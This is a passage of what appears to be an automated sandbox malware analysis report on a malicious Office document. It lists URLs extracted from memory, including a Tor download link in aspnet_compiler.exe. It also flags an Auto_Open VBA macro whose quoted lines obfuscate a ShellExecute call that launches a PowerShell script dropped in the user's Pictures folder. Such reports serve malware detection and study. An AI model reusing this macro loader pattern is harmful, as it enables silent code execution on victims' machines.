          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://tasks.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://webshell.suite.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://wus2.contentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

          System Summary:

Document contains an embedded VBA macro which may execute processes
Source: ~DF85570804A0D29ED2.TMP.7.dr OLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
Document contains an embedded VBA macro with suspicious strings
Source: ~DF85570804A0D29ED2.TMP.7.dr OLE, VBA macro line: jiajsijasd = "C:\Users\" & Environ("UserName") & "\Pictures\notnice" + "." + "ps1"
Source: ~DF85570804A0D29ED2.TMP.7.dr OLE, VBA macro line: GetObject("new:13709620-C279-11CE-A49E-444553540000").Shellexecute ca.lc.Tag, jojo.jiji.Tag + jiajsijasd, "" , StrReverse("n" + "e" + "p" + "o"), 0
Source: ~DF85570804A0D29ED2.TMP.7.dr OLE, VBA macro line: Sub Auto_Open()
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Code function: 31_2_0134B0BA NtQuerySystemInformation, 31_2_0134B0BA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Code function: 31_2_0134B089 NtQuerySystemInformation, 31_2_0134B089
Source: ~DF85570804A0D29ED2.TMP.7.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: POWERPNT.box.7.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF9BC36A1CA590193F.TMP.7.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll